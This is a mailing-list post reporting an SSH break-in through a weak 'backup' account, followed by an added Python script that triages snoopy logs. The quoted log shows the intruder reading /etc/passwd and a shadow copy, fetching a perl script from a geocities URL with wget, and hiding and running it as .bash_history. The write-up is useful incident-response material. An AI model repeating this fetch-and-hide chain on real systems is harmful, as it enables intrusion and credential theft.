-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi everybody,
guess it was my time - this time...
Ok .. about 4 hours ago the following happened on one of my machines:
1) Somebody tried a dictionary attack from one host (213.215.220.14)
2) He/She/It got in using the user backup (I know.. I know ..)
3) H/S/I downloaded 2 files from a geocities.com account
4) File 1 - no idea what it is or what it does - cannot find it
5) File 2 - a perl script that "claims" to be a telnet server
After taking the machine offline, I did the following:
a) locked user backup
b) removed password/interactive login from sshd (should have been done a long time ago)
c) killed the perl script running as user backup
d) find -user backup -mtime 1 > /tmp/file
e) nmap localhost for all ports
f) checked /tmp/file for "unknown files" - found /tmp/.bash_history
g) moved /tmp/.bash_history off the machine for analysis
Here is the snoopy log:
----
Feb 6 10:33:26 mail2 sshd[15544]: Accepted password for backup from 213.215.220.14 port 38842 ssh2
Feb 6 10:33:26 mail2 sshd[22307]: (pam_unix) session opened for user backup by (uid=0)
Feb 6 10:33:26 mail2 snoopy[25178]: [backup, uid:34 sid:25178]: -sh
Feb 6 10:33:26 mail2 snoopy[25087]: [backup, uid:34 sid:25178]: id -u
Feb 6 10:33:41 mail2 sshd[22307]: (pam_unix) session closed for user backup
Feb 6 10:57:26 mail2 sshd[1306]: Accepted keyboard-interactive/pam for backup from 66.40.38.102 port 45424 ssh2
Feb 6 10:57:26 mail2 sshd[4008]: (pam_unix) session opened for user backup by (uid=0)
Feb 6 10:57:26 mail2 snoopy[22447]: [backup, uid:34 sid:22447]: -sh
Feb 6 10:57:26 mail2 snoopy[10020]: [backup, uid:34 sid:22447]: id -u
Feb 6 10:57:30 mail2 snoopy[9165]: [backup, uid:34 sid:22447]: ls -all
Feb 6 10:57:35 mail2 snoopy[18242]: [backup, uid:34 sid:22447]: id
Feb 6 10:57:42 mail2 snoopy[27934]: [backup, uid:34 sid:22447]: uname - -a
Feb 6 10:57:47 mail2 snoopy[27769]: [backup, uid:34 sid:22447]: cat /etc/passwd
Feb 6 10:58:34 mail2 snoopy[19303]: [backup, uid:34 sid:22447]: /sbin/ifconfig
Feb 6 10:58:42 mail2 snoopy[31999]: [backup, uid:34 sid:22447]: cat /etc/hosts
Feb 6 10:59:06 mail2 snoopy[26230]: [backup, uid:34 sid:22447]: ls -all
Feb 6 10:59:09 mail2 snoopy[3092]: [backup, uid:34 sid:22447]: wget
Feb 6 10:59:26 mail2 snoopy[20851]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p
Feb 6 10:59:36 mail2 snoopy[25767]: [backup, uid:34 sid:22447]: cat shadow.bak
Feb 6 10:59:41 mail2 snoopy[31313]: [backup, uid:34 sid:22447]: ls -all
Feb 6 10:59:51 mail2 snoopy[14269]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p
Feb 6 11:00:00 mail2 snoopy[1647]: [backup, uid:34 sid:22447]: mv jam5.pl.txt .bash_history
Feb 6 11:00:06 mail2 snoopy[22380]: [backup, uid:34 sid:22447]: chmod 755 .bash_history
Feb 6 11:00:10 mail2 snoopy[29495]: [backup, uid:34 sid:22447]: perl .bash_history
Feb 6 11:00:12 mail2 snoopy[29908]: [backup, uid:34 sid:22447]: ps -x
Feb 6 11:00:16 mail2 snoopy[4918]: [backup, uid:34 sid:22447]: ls -all
Feb 6 11:00:18 mail2 snoopy[12984]: [backup, uid:34 sid:22447]: w
Feb 6 11:01:20 mail2 sshd[4008]: (pam_unix) session closed for user backup
----
The telnet server doesn't seem to make any entries in wtmp, hence no `last` or `w` entries on the machine.
However, snoopy still sees what the user does :)
As far as I can say, H/S/I hasn't been on my machine since. The firewall didn't permit access to the port (34567)
opened by the perl script, and my firewall log shows no access to that port before I tried it from localhost.
The machine runs Linux 2.4.27-grsec-hi, woody testing.
I'm considering taking it back online with a 2.4.29-grsec-hi, what do you guys think?
- Many thanks, Peter
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iEYEARECAAYFAkIGSmMACgkQ7qdt1xpQls/FOwCfSDJbpUyuAMES5KYMQKQMVcCd
im0AoIhY+DeJghyPAGm2Fv4RAuWvycQV
=ctGL
-----END PGP SIGNATURE-----
-- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
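The snoopy log above is a good illustration of why per-command execution logging catches what wtmp-based tools (`last`, `w`) miss. The following is an added example, not part of Peter's post or of snoopy itself: a small Python triage script that parses snoopy lines in the format shown above, groups them by session id, and tags the pattern seen in the post (download from a remote host, rename of the payload to a dotfile, chmod, interpreter run on that dotfile, reads of /etc/passwd and shadow copies). The tag rules, thresholds and the decision that a session is "suspicious" only when a download is combined with dotfile staging or execution are my own assumptions for the example; the log lines embedded in it are quoted from the post (the two sshd sessions, sid 25178 and sid 22447).

```python
"""Triage snoopy execution logs: group commands by sid and flag staging chains.

Added example (not snoopy's or the original poster's code). Tag rules below
are assumptions chosen to match the incident described in the post.
"""
import os
import re
import shlex

# Log lines quoted from the post (sid 25178 = first login, sid 22447 = the
# session that downloaded and ran the perl script).
SNOOPY_LOG = """\
Feb 6 10:33:26 mail2 snoopy[25178]: [backup, uid:34 sid:25178]: -sh
Feb 6 10:33:26 mail2 snoopy[25087]: [backup, uid:34 sid:25178]: id -u
Feb 6 10:57:26 mail2 snoopy[22447]: [backup, uid:34 sid:22447]: -sh
Feb 6 10:57:26 mail2 snoopy[10020]: [backup, uid:34 sid:22447]: id -u
Feb 6 10:57:30 mail2 snoopy[9165]: [backup, uid:34 sid:22447]: ls -all
Feb 6 10:57:42 mail2 snoopy[27934]: [backup, uid:34 sid:22447]: uname - -a
Feb 6 10:57:47 mail2 snoopy[27769]: [backup, uid:34 sid:22447]: cat /etc/passwd
Feb 6 10:58:34 mail2 snoopy[19303]: [backup, uid:34 sid:22447]: /sbin/ifconfig
Feb 6 10:58:42 mail2 snoopy[31999]: [backup, uid:34 sid:22447]: cat /etc/hosts
Feb 6 10:59:09 mail2 snoopy[3092]: [backup, uid:34 sid:22447]: wget
Feb 6 10:59:26 mail2 snoopy[20851]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p
Feb 6 10:59:36 mail2 snoopy[25767]: [backup, uid:34 sid:22447]: cat shadow.bak
Feb 6 10:59:51 mail2 snoopy[14269]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p
Feb 6 11:00:00 mail2 snoopy[1647]: [backup, uid:34 sid:22447]: mv jam5.pl.txt .bash_history
Feb 6 11:00:06 mail2 snoopy[22380]: [backup, uid:34 sid:22447]: chmod 755 .bash_history
Feb 6 11:00:10 mail2 snoopy[29495]: [backup, uid:34 sid:22447]: perl .bash_history
Feb 6 11:00:12 mail2 snoopy[29908]: [backup, uid:34 sid:22447]: ps -x
Feb 6 11:00:18 mail2 snoopy[12984]: [backup, uid:34 sid:22447]: w
"""

# Matches the snoopy line shape used above: "[user, uid:N sid:N]: command".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) snoopy\[\d+\]: "
    r"\[(?P<user>[^,]+), uid:(?P<uid>\d+) sid:(?P<sid>\d+)\]: (?P<cmd>.*)$"
)

# Assumed indicator sets (tune for your environment).
DOWNLOADERS = {"wget", "curl", "ftp", "tftp", "lynx", "fetch"}
INTERPRETERS = {"perl", "python", "sh", "bash", "ruby", "php"}
RECON_FILES = ("/etc/passwd", "/etc/hosts", "shadow")
RECON_CMDS = {"id", "uname", "ifconfig", "w", "who", "ps", "netstat"}


def parse(text):
    """Return one dict per recognised snoopy line; unknown lines are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def is_dotfile(arg):
    base = arg.rsplit("/", 1)[-1]
    return base.startswith(".") and base not in (".", "..")


def classify(cmd):
    """Tags for one logged command; empty list when nothing stands out."""
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes in the logged command
        argv = cmd.split()
    if not argv:
        return []
    prog = os.path.basename(argv[0]).lstrip("-")  # login shells log as "-sh"
    args = argv[1:]
    tags = []
    if prog in DOWNLOADERS and args:  # bare "wget" with no URL is just a typo
        tags.append("download")
    if prog == "mv" and len(args) >= 2 and is_dotfile(args[-1]):
        tags.append("dotfile-rename")
    if prog == "chmod" and any(is_dotfile(a) for a in args):
        tags.append("dotfile-chmod")
    if prog in INTERPRETERS and any(is_dotfile(a) for a in args):
        tags.append("dotfile-exec")
    if prog == "cat" and any(any(r in a for r in RECON_FILES) for a in args):
        tags.append("recon-file")
    if prog in RECON_CMDS:
        tags.append("recon")
    return tags


def analyze(events):
    """Group events by sid, keeping first/last timestamp and tagged findings."""
    sessions = {}
    for ev in events:
        s = sessions.setdefault(ev["sid"], {"user": ev["user"], "start": ev["ts"],
                                            "end": ev["ts"], "findings": []})
        s["end"] = ev["ts"]
        for tag in classify(ev["cmd"]):
            s["findings"].append((ev["ts"], tag, ev["cmd"]))
    return sessions


def suspicious_sessions(sessions):
    """Flag a sid only when a download is combined with dotfile staging/execution.
    Recon on its own (id, uname, cat /etc/passwd) is too noisy to flag alone."""
    staging = {"dotfile-rename", "dotfile-chmod", "dotfile-exec"}
    out = []
    for sid, s in sessions.items():
        tags = {t for _, t, _ in s["findings"]}
        if "download" in tags and tags & staging:
            out.append(sid)
    return sorted(out)


if __name__ == "__main__":
    sessions = analyze(parse(SNOOPY_LOG))
    for sid in suspicious_sessions(sessions):
        s = sessions[sid]
        print(f"sid {sid} user={s['user']} {s['start']} .. {s['end']}")
        for ts, tag, cmd in s["findings"]:
            print(f"  {ts}  {tag:15} {cmd}")
```

Running it against the quoted log flags only sid 22447 (download + rename to `.bash_history` + chmod + `perl .bash_history`); the earlier sid 25178 login, which only ran `id -u`, produces a recon tag but is not flagged. Pointing `parse()` at your own syslog output for snoopy instead of `SNOOPY_LOG` is the only change needed for real use.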